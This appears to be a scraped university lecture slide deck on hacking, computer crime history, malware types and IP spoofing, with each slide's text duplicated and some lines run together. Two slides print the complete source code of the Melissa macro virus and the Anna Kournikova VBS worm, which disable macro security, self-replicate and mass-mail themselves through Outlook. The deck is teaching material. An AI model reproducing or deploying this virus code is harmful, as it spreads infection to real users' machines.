hacking and Computer viruses for Cyber Security
DrArunSinghChouhan
12 views
71 slides
May 01, 2024
Slide 1 of 71
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
About This Presentation
hacking, Computer viruses
Slide Content
Computer Security
GSBA (Zurich): MIS Block
Hacking
GSBA (Zurich): MIS Block
Hacking
Sanjay Goel, School of Business, University at Albany
2
•Crisis
•Computer Crimes
•Hacker Attacks
•Modes of Computer Security
–Password Security
–Network Security
–Web Security
–Distributed Systems Security
–Database Security
Topics
2
•Crisis
•Computer Crimes
•Hacker Attacks
•Modes of Computer Security
–Password Security
–Network Security
–Web Security
–Distributed Systems Security
–Database Security
Topics
Sanjay Goel, School of Business, University at Albany
3
•Internet has grown very fast and security has
lagged behind.
•Legions of hackers have emerged as impedance to
entering the hackers club is low.
•It is hard to trace the perpetrator of cyber attacks
since the real identities are camouflaged
•It is very hard to track down people because of the
ubiquity of the network.
•Large scale failures of internet can have a
catastrophic impact on the economy which relies
heavily on electronic transactions
Crisis
3
•Internet has grown very fast and security has
lagged behind.
•Legions of hackers have emerged as impedance to
entering the hackers club is low.
•It is hard to trace the perpetrator of cyber attacks
since the real identities are camouflaged
•It is very hard to track down people because of the
ubiquity of the network.
•Large scale failures of internet can have a
catastrophic impact on the economy which relies
heavily on electronic transactions
Crisis
Sanjay Goel, School of Business, University at Albany
4
•In 1988 a "worm program" written by a
college student shut down about 10 percent
of computers connected to the Internet.
This was the beginning of the era of cyber
attacks.
•Today we have about 10,000 incidents of
cyber attacks which are reported and the
number is growing.
Computer Crime –The Beginning
4
•In 1988 a "worm program" written by a
college student shut down about 10 percent
of computers connected to the Internet.
This was the beginning of the era of cyber
attacks.
•Today we have about 10,000 incidents of
cyber attacks which are reported and the
number is growing.
Computer Crime –The Beginning
Sanjay Goel, School of Business, University at Albany
5
•A 16-year-old music student called Richard Pryce,
better known by the hacker alias Datastream
Cowboy, is arrested and charged with breaking
into hundreds of computers including those at the
Griffiths Air Force base, Nasa and the Korean
Atomic Research Institute. His online mentor,
"Kuji", is never found.
•Also this year, a group directed by Russian hackers
broke into the computers of Citibank and
transferred more than $10 million from customers'
accounts. Eventually, Citibank recovered all but
$400,000 of the pilfered money.
Computer Crime -1994
5
•A 16-year-old music student called Richard Pryce,
better known by the hacker alias Datastream
Cowboy, is arrested and charged with breaking
into hundreds of computers including those at the
Griffiths Air Force base, Nasa and the Korean
Atomic Research Institute. His online mentor,
"Kuji", is never found.
•Also this year, a group directed by Russian hackers
broke into the computers of Citibank and
transferred more than $10 million from customers'
accounts. Eventually, Citibank recovered all but
$400,000 of the pilfered money.
Computer Crime -1994
Sanjay Goel, School of Business, University at Albany
6
•In February, Kevin Mitnick is arrested for a second
time. He is charged with stealing 20,000 credit card
numbers. He eventually spends four years in jail
and on his release his parole conditions demand
that he avoid contact with computers and mobile
phones.
•On November 15, Christopher Pile becomes the first
person to be jailed for writing and distributing a
computer virus. Mr Pile, who called himself the
Black Baron, was sentenced to 18 months in jail.
•The US General Accounting Office reveals that US
Defense Department computers sustained 250,000
attacks in 1995.
Computer Crime -1995
6
•In February, Kevin Mitnick is arrested for a second
time. He is charged with stealing 20,000 credit card
numbers. He eventually spends four years in jail
and on his release his parole conditions demand
that he avoid contact with computers and mobile
phones.
•On November 15, Christopher Pile becomes the first
person to be jailed for writing and distributing a
computer virus. Mr Pile, who called himself the
Black Baron, was sentenced to 18 months in jail.
•The US General Accounting Office reveals that US
Defense Department computers sustained 250,000
attacks in 1995.
Computer Crime -1995
Sanjay Goel, School of Business, University at Albany
7
•In March, the Melissa virus goes on the rampage
and wreaks havoc with computers worldwide. After
a short investigation, the FBI tracks down and
arrests the writer of the virus, a 29-year-old New
Jersey computer programmer, David L. Smith.
•More than 90 percent of large corporations and
government agencies were the victims of
computer security breaches in 1999
Computer Crime -1999
7
•In March, the Melissa virus goes on the rampage
and wreaks havoc with computers worldwide. After
a short investigation, the FBI tracks down and
arrests the writer of the virus, a 29-year-old New
Jersey computer programmer, David L. Smith.
•More than 90 percent of large corporations and
government agencies were the victims of
computer security breaches in 1999
Computer Crime -1999
Sanjay Goel, School of Business, University at Albany
8
•In February, some of the most popular websites in
the world such as Amazon and Yahoo are almost
overwhelmed by being flooded with bogus
requests for data.
•In May, the ILOVEYOU virus is unleashed and clogs
computers worldwide. Over the coming months,
variants of the virus are released that manage to
catch out companies that didn't do enough to
protect themselves.
•In October, Microsoft admits that its corporate
network has been hacked and source code for
future Windows products has been seen.
Computer Crime -2000
8
•In February, some of the most popular websites in
the world such as Amazon and Yahoo are almost
overwhelmed by being flooded with bogus
requests for data.
•In May, the ILOVEYOU virus is unleashed and clogs
computers worldwide. Over the coming months,
variants of the virus are released that manage to
catch out companies that didn't do enough to
protect themselves.
•In October, Microsoft admits that its corporate
network has been hacked and source code for
future Windows products has been seen.
Computer Crime -2000
Sanjay Goel, School of Business, University at Albany
9
•In April 2002, computer hackers calling
themselves “Deceptive Duo” announced
that they had begun their mission of
breaking into computer systems to call
attention to the vulnerabilities in the US
National Security
–In subsequent weeks they hacked into 52 web
sites and databases including those operated
by the US office of secretary of defense, the
space and Naval Warfare Systems Command,
The Defense Logistics Agency, Sandia National
Lab, NASA JPL, Airlines, Banks …
Computer Crime -2002
9
•In April 2002, computer hackers calling
themselves “Deceptive Duo” announced
that they had begun their mission of
breaking into computer systems to call
attention to the vulnerabilities in the US
National Security
–In subsequent weeks they hacked into 52 web
sites and databases including those operated
by the US office of secretary of defense, the
space and Naval Warfare Systems Command,
The Defense Logistics Agency, Sandia National
Lab, NASA JPL, Airlines, Banks …
Computer Crime -2002
Sanjay Goel, School of Business, University at Albany
10Intrusion incident reports compiled by CERT
(Source http://www.cert.org/stats)
0
20000
40000
60000
80000
100000
120000
1986 1988 1990 1992 1994 1996 1998 2000 2002 2004
Year
Incident Reports
Intrusion Incident Reports YearIncidents
1988 6
1989 132
1990 252
1991 406
1992 773
19931,334
19942,340
19952,412
19962,573
19972,134
19983,734
19999,859
200021,756
200152,658
2002100,000
Note: Projected from 3 quarters of data
10Intrusion incident reports compiled by CERT
(Source http://www.cert.org/stats)
0
20000
40000
60000
80000
100000
120000
1986 1988 1990 1992 1994 1996 1998 2000 2002 2004
Year
Incident Reports
Intrusion Incident Reports YearIncidents
1988 6
1989 132
1990 252
1991 406
1992 773
19931,334
19942,340
19952,412
19962,573
19972,134
19983,734
19999,859
200021,756
200152,658
2002100,000
Note: Projected from 3 quarters of data
Sanjay Goel, School of Business, University at Albany
11
•Increased complexity of the systems
–Large networks with switches, hubs, gateways provide multiple
entry points
–Very sophisticated software using millions of lines of code which
leave holes for hackers to attack
•Constantly upgrading computer systems and software
–Support staff not able to keep up with security provisions
–New technology (often not fully tested) adds new risk
•Lack of proper education
–Managers do not realize the vulnerabilities and are not willing to
invest in technology that does not directly effect the bottom
line
•Dependence on commercial software with known
vulnerabilities
–e.g. Microsoft Windows OS and Outlook
Why are we vulnerable?
11
•Increased complexity of the systems
–Large networks with switches, hubs, gateways provide multiple
entry points
–Very sophisticated software using millions of lines of code which
leave holes for hackers to attack
•Constantly upgrading computer systems and software
–Support staff not able to keep up with security provisions
–New technology (often not fully tested) adds new risk
•Lack of proper education
–Managers do not realize the vulnerabilities and are not willing to
invest in technology that does not directly effect the bottom
line
•Dependence on commercial software with known
vulnerabilities
–e.g. Microsoft Windows OS and Outlook
Why are we vulnerable?
Sanjay Goel, School of Business, University at Albany
12
VIRUSES
12
VIRUSES
Sanjay Goel, School of Business, University at Albany
13
•Computervirusesareself-replicatingsoftware
entitiesthatattachthemselvesparasiticallyto
existingprograms.
•Thevirusspreadsbycreatingreplicaofitselfand
attachingitselftootherexecutableprogramsto
whichithaswriteaccess.
–Atruevirusdoesnotspreadfrommachinetomachineon
itsown.Itmustbepassedontootherusersviae-mail,
infectedfiles/diskettes,programsorsharedfiles
•Thevirusesnormallyconsistoftwoparts
–Replicator:responsibleforcopyingthevirustoother
executableprograms.
–Payload:Actionofthevirus,whichmaybebenignsuchas
printingaweirdmessage,playingmusicormalicious
suchasdestroyingdataorcorruptingtheharddisk.
Virus
13
•Computervirusesareself-replicatingsoftware
entitiesthatattachthemselvesparasiticallyto
existingprograms.
•Thevirusspreadsbycreatingreplicaofitselfand
attachingitselftootherexecutableprogramsto
whichithaswriteaccess.
–Atruevirusdoesnotspreadfrommachinetomachineon
itsown.Itmustbepassedontootherusersviae-mail,
infectedfiles/diskettes,programsorsharedfiles
•Thevirusesnormallyconsistoftwoparts
–Replicator:responsibleforcopyingthevirustoother
executableprograms.
–Payload:Actionofthevirus,whichmaybebenignsuchas
printingaweirdmessage,playingmusicormalicious
suchasdestroyingdataorcorruptingtheharddisk.
Virus
Sanjay Goel, School of Business, University at Albany
14
•Whenauserexecutesaninfectedprogram(an
executablefileorbootsector),theviralportionof
thecodetypicallyexecutesfirstandthenthe
controlreturnstotheoriginalprogram,which
executesnormally.
•Unlessthevirusexecutesapayloadwhichtheuser
observestheuserisnotlikelytofindthevirus
operatingonhis/herharddrive.
•Virusescanpersistinyourprogramsforalong
timewithoutbeingdetectedthusconstantly
upgradingyourvirussignaturesandrunningvirus
scansisveryimportant.
Virus
14
•Whenauserexecutesaninfectedprogram(an
executablefileorbootsector),theviralportionof
thecodetypicallyexecutesfirstandthenthe
controlreturnstotheoriginalprogram,which
executesnormally.
•Unlessthevirusexecutesapayloadwhichtheuser
observestheuserisnotlikelytofindthevirus
operatingonhis/herharddrive.
•Virusescanpersistinyourprogramsforalong
timewithoutbeingdetectedthusconstantly
upgradingyourvirussignaturesandrunningvirus
scansisveryimportant.
Virus
Sanjay Goel, School of Business, University at Albany
15
•Polymorphicviruses
–Viruseswhichmodifythemselvespriorto
attachingthemselvestoanotherprogram.
–Thesearehardtodetectsincetheyare
constantlychangingtheirsignature.
•MacroViruses
–Thesevirusesuseanapplicationmacro
language(suchasVBorVBScript)tocreate
programsthatinfectdocumentsandtemplates
–Ifaninfecteddocumentisopenedthevirusis
executedanditinfectstheusersapplication
templates
Virus
15
•Polymorphicviruses
–Viruseswhichmodifythemselvespriorto
attachingthemselvestoanotherprogram.
–Thesearehardtodetectsincetheyare
constantlychangingtheirsignature.
•MacroViruses
–Thesevirusesuseanapplicationmacro
language(suchasVBorVBScript)tocreate
programsthatinfectdocumentsandtemplates
–Ifaninfecteddocumentisopenedthevirusis
executedanditinfectstheusersapplication
templates
Virus
Sanjay Goel, School of Business, University at Albany
16
// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 -1): Options.VirusProtection = (1 -1):
Options.SaveNormalPrompt = (1 -1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
Melissa Virus
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\",
"Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."
End Sub
16
// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 -1): Options.VirusProtection = (1 -1):
Options.SaveNormalPrompt = (1 -1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
Melissa Virus
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\",
"Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."
End Sub
Sanjay Goel, School of Business, University at Albany
17
•Wormsareaformofself-replicatingprogramsthatcan
automaticallyspread.
–Unlikethevirusestheydonotneedacarrierprogram
andtheyreplicatebyspawningcopiesofthemselves.
–Theyaremorecomplexandaremuchhardertowrite
thanthevirusprograms.
•ILOVEYOU worm in 2000 automatically emailed itself to
the first 200 entries in the outlook address book
–The worm spread to 10 million computers in two days
which were required to create a patch for it
–Itcostbillionsofdollarstorepairthedamage
•Sometimeswormstakealongtimetospread
–AnnaKournikovawormwasdiscoveredinAugust2000
andbecameaseriousthreatinFebruary2001
•CodeRed,Nimbda,SirCamareotherwormseachof
whichcostupwardsof500milliondollarsindamages
Worms
17
•Wormsareaformofself-replicatingprogramsthatcan
automaticallyspread.
–Unlikethevirusestheydonotneedacarrierprogram
andtheyreplicatebyspawningcopiesofthemselves.
–Theyaremorecomplexandaremuchhardertowrite
thanthevirusprograms.
•ILOVEYOU worm in 2000 automatically emailed itself to
the first 200 entries in the outlook address book
–The worm spread to 10 million computers in two days
which were required to create a patch for it
–Itcostbillionsofdollarstorepairthedamage
•Sometimeswormstakealongtimetospread
–AnnaKournikovawormwasdiscoveredinAugust2000
andbecameaseriousthreatinFebruary2001
•CodeRed,Nimbda,SirCamareotherwormseachof
whichcostupwardsof500milliondollarsindamages
Worms
Sanjay Goel, School of Business, University at Albany
18
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set WScriptShell = CreateObject("WScript.Shell")
WScriptShell.regwrite "HKCU \software\OnTheFly\", "Worm made with Vbswg 1.50b"
Set FileSystemObject = Createobject("scripting.filesystemobject")
FileSystemObject.copyfile wscript.scriptfullname,FileSystemObject.GetSpecialFolder(0) & " \AnnaKournikova.jpg.vbs"
if WScriptShell.regread ("HKCU \software\OnTheFly\mailed") <> "1" then
doMail()
end if
if month(now) = 1 and day(now) = 26 then
WScriptShell.run "Http://www.dynabyte.nl",3,false
end if
Set thisScript = FileSystemObject.opentextfile(wscript.scriptfullname, 1)
thisScriptText = thisScript.readall
thisScript.Close
Do
If Not (FileSystemObject.fileexists(wscript.scriptfullname)) Then
Set newFile = FileSystemObject.createtextfile(wscript.scriptfullname, True)
newFile.write thisScriptText
newFile.Close
End If
Loop
Function doMail()
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If OutlookApp = "Outlook" Then
Set MAPINameSpace = OutlookApp.GetNameSpace("MAPI")
Set AddressLists = MAPINameSpace.AddressLists
For Each address In AddressLists
If address.AddressEntries.Count <> 0 Then
entryCount = address.AddressEntries.Count
For i = 1 To entryCount
Set newItem = OutlookApp.CreateItem(0)
Set currentAddress = address.AddressEntries(i)
newItem.To = currentAddress.Address
newItem.Subject = "Here you have, ;o)"
newItem.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set attachments = newItem.Attachments
attachments.Add FileSystemObject.GetSpecialFolder(0) & " \AnnaKournikova.jpg.vbs"
newItem.DeleteAfterSubmit = True
If newItem.To <> "" Then
newItem.Send
WScriptShell.regwrite "HKCU \software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
Worm (Anna Kournikova)
18
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set WScriptShell = CreateObject("WScript.Shell")
WScriptShell.regwrite "HKCU \software\OnTheFly\", "Worm made with Vbswg 1.50b"
Set FileSystemObject = Createobject("scripting.filesystemobject")
FileSystemObject.copyfile wscript.scriptfullname,FileSystemObject.GetSpecialFolder(0) & " \AnnaKournikova.jpg.vbs"
if WScriptShell.regread ("HKCU \software\OnTheFly\mailed") <> "1" then
doMail()
end if
if month(now) = 1 and day(now) = 26 then
WScriptShell.run "Http://www.dynabyte.nl",3,false
end if
Set thisScript = FileSystemObject.opentextfile(wscript.scriptfullname, 1)
thisScriptText = thisScript.readall
thisScript.Close
Do
If Not (FileSystemObject.fileexists(wscript.scriptfullname)) Then
Set newFile = FileSystemObject.createtextfile(wscript.scriptfullname, True)
newFile.write thisScriptText
newFile.Close
End If
Loop
Function doMail()
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If OutlookApp = "Outlook" Then
Set MAPINameSpace = OutlookApp.GetNameSpace("MAPI")
Set AddressLists = MAPINameSpace.AddressLists
For Each address In AddressLists
If address.AddressEntries.Count <> 0 Then
entryCount = address.AddressEntries.Count
For i = 1 To entryCount
Set newItem = OutlookApp.CreateItem(0)
Set currentAddress = address.AddressEntries(i)
newItem.To = currentAddress.Address
newItem.Subject = "Here you have, ;o)"
newItem.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set attachments = newItem.Attachments
attachments.Add FileSystemObject.GetSpecialFolder(0) & " \AnnaKournikova.jpg.vbs"
newItem.DeleteAfterSubmit = True
If newItem.To <> "" Then
newItem.Send
WScriptShell.regwrite "HKCU \software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
Worm (Anna Kournikova)
Sanjay Goel, School of Business, University at Albany
19
•This is a program that secretly gets installed
on a computer planting a secret payload that
can allow a hacker who planted it access to do
things such as stealing passwords or recording
key strokes and transmitting them to a third
party
•A logic bomb is a trojan horse that executes
when certain conditions become true
–Most commonly executes at a specific date and time
•Example: Cute Trojan Horse allows hackers to
destroy the firewalls installed on computers.
Trojan Horse
19
•This is a program that secretly gets installed
on a computer planting a secret payload that
can allow a hacker who planted it access to do
things such as stealing passwords or recording
key strokes and transmitting them to a third
party
•A logic bomb is a trojan horse that executes
when certain conditions become true
–Most commonly executes at a specific date and time
•Example: Cute Trojan Horse allows hackers to
destroy the firewalls installed on computers.
Trojan Horse
Sanjay Goel, School of Business, University at Albany
20
HACKERS
20
HACKERS
Sanjay Goel, School of Business, University at Albany
21
•Most hackers try to test the system limitations out of intellectual
curiosity & bragging rights
•Cyber criminals hack into corporate computers to steal money or
credit card numbers
–In March 2001 FBI reported that over 1 million credit card numbers were
stolen by cyber criminals in Russia & Ukraine
•Cyber terrorists try to push their political agenda by coercion via
computer-based attacks against computers and networks
–NATO computers were blasted with infected emails to protest against
bombings in Kosovo during the 1999 conflict
–Lucent was made target for DOS attacks by a group protesting against its
business with Israel
•Disgruntled employees often venting anger at a company or
organization by hacking & stealing information or causing
damage to computer systems
Why do Hackers Attack?
21
•Most hackers try to test the system limitations out of intellectual
curiosity & bragging rights
•Cyber criminals hack into corporate computers to steal money or
credit card numbers
–In March 2001 FBI reported that over 1 million credit card numbers were
stolen by cyber criminals in Russia & Ukraine
•Cyber terrorists try to push their political agenda by coercion via
computer-based attacks against computers and networks
–NATO computers were blasted with infected emails to protest against
bombings in Kosovo during the 1999 conflict
–Lucent was made target for DOS attacks by a group protesting against its
business with Israel
•Disgruntled employees often venting anger at a company or
organization by hacking & stealing information or causing
damage to computer systems
Why do Hackers Attack?
Sanjay Goel, School of Business, University at Albany
22
•Active Attacks
–Denial of Service
–Breaking into a site
•Intelligence Gathering
•Resource Usage
•Deception
•Passive Attacks
–Sniffing
•Passwords
•Network Traffic
•Sensitive Information
–Information Gathering
Types of Hacker Attack
22
•Active Attacks
–Denial of Service
–Breaking into a site
•Intelligence Gathering
•Resource Usage
•Deception
•Passive Attacks
–Sniffing
•Passwords
•Network Traffic
•Sensitive Information
–Information Gathering
Types of Hacker Attack
Sanjay Goel, School of Business, University at Albany
23
•Spoofing
•Session Hijacking
•Denial of Service Attacks
•Buffer Overflow Attacks
•Password Attacks
Modes of Hacker Attack
23
•Spoofing
•Session Hijacking
•Denial of Service Attacks
•Buffer Overflow Attacks
•Password Attacks
Modes of Hacker Attack
Sanjay Goel, School of Business, University at Albany
24
Definition:
An attacker alters his identity so that some one thinks he
is some one else
–Email, User ID, IP Address, …
–Attacker exploits trust relation between user and
networked machines to gain access to machines
Types of Spoofing:
1.IP Spoofing:
2.Email Spoofing
3.Web Spoofing
Spoofing
24
Definition:
An attacker alters his identity so that some one thinks he
is some one else
–Email, User ID, IP Address, …
–Attacker exploits trust relation between user and
networked machines to gain access to machines
Types of Spoofing:
1.IP Spoofing:
2.Email Spoofing
3.Web Spoofing
Spoofing
Sanjay Goel, School of Business, University at Albany
25
•There are three basic flavors of IP
spoofing attacks
–Basic Address Change
–Use of source routing to intercept packets
–Exploiting of a trust relationship on UNIX
machines
IP Spoofing
25
•There are three basic flavors of IP
spoofing attacks
–Basic Address Change
–Use of source routing to intercept packets
–Exploiting of a trust relationship on UNIX
machines
IP Spoofing
Sanjay Goel, School of Business, University at Albany
26
Definition:
Attacker uses IP address of another computer to acquire
information or gain access
IP Spoofing –Basic Address
Change
Replies sent back to 10.10.20.30
Spoofed Address
10.10.20.30
Attacker
10.10.50.50
John
10.10.5.5
From Address: 10.10.20.30
To Address: 10.10.5.5
• Attacker changes his own IP address
to spoofed address
• Attacker can send messages to a
machine masquerading as spoofed
machine
• Attacker can not receive messages
from that machine
26
Definition:
Attacker uses IP address of another computer to acquire
information or gain access
IP Spoofing –Basic Address
Change
Replies sent back to 10.10.20.30
Spoofed Address
10.10.20.30
Attacker
10.10.50.50
John
10.10.5.5
From Address: 10.10.20.30
To Address: 10.10.5.5
• Attacker changes his own IP address
to spoofed address
• Attacker can send messages to a
machine masquerading as spoofed
machine
• Attacker can not receive messages
from that machine
Sanjay Goel, School of Business, University at Albany
27
•Simple Mechanism
–From start menu select settings Control Panel
–Double click on the network icon
–Right click the LAN connection and select properties
–select Internet Protocol (TCP/IP) and click on
properties
–Change the IP address to the address you want to
spoof
–Reboot the machine
–All packets sent from the machine have the spoofed
address
Basic Address Change (Windows)
27
•Simple Mechanism
–From start menu select settings Control Panel
–Double click on the network icon
–Right click the LAN connection and select properties
–select Internet Protocol (TCP/IP) and click on
properties
–Change the IP address to the address you want to
spoof
–Reboot the machine
–All packets sent from the machine have the spoofed
address
Basic Address Change (Windows)
Sanjay Goel, School of Business, University at Albany
28
•Use ifconfig command
–Write Details
Basic Address Change (Unix)
28
•Use ifconfig command
–Write Details
Basic Address Change (Unix)
Sanjay Goel, School of Business, University at Albany
29
•Limitation
–Flying Blind Attack i.e. user can not get
return messages
–Any protocol which requires 3-way
connection can not be used
–UDP which is connectionless can be used to
send packets
•Uses
–Used in denial-of-service attack where a
single packet can crash a machine
IP-Spoofing (Basic Address
Change)
29
•Limitation
–Flying Blind Attack i.e. user can not get
return messages
–Any protocol which requires 3-way
connection can not be used
–UDP which is connectionless can be used to
send packets
•Uses
–Used in denial-of-service attack where a
single packet can crash a machine
IP-Spoofing (Basic Address
Change)
Sanjay Goel, School of Business, University at Albany
30
•Prevention
–You can protect your machines from being used to launch a
spoofing attack
–You can do little to prevent other people from spoofing your
address
•Users can be prevented from having access to network
configuration
•To protect your company from spoofing attack you can
apply basic filters at your routers
–Ingress Filtering: Prevent packets from outside coming in with
address from inside.
–Egress Filtering: Prevents packets not having an internal
address from leaving the network
IP Spoofing –Basic Address
Change
30
•Prevention
–You can protect your machines from being used to launch a
spoofing attack
–You can do little to prevent other people from spoofing your
address
•Users can be prevented from having access to network
configuration
•To protect your company from spoofing attack you can
apply basic filters at your routers
–Ingress Filtering: Prevent packets from outside coming in with
address from inside.
–Egress Filtering: Prevents packets not having an internal
address from leaving the network
IP Spoofing –Basic Address
Change
Sanjay Goel, School of Business, University at Albany
31
Definition:
Attacker spoofs the address of another machine and
inserts itself between the attacked machine and the
spoofed machine to intercept replies
IP Spoofing –Source Routing
Replies sent back
to 10.10.20.30
Spoofed Address
10.10.20.30
Attacker
10.10.50.50
John
10.10.5.5
From Address: 10.10.20.30
To Address: 10.10.5.5
•The path a packet may change can vary over time
Attacker intercepts packets
as they go to 10.10.20.30
31
Definition:
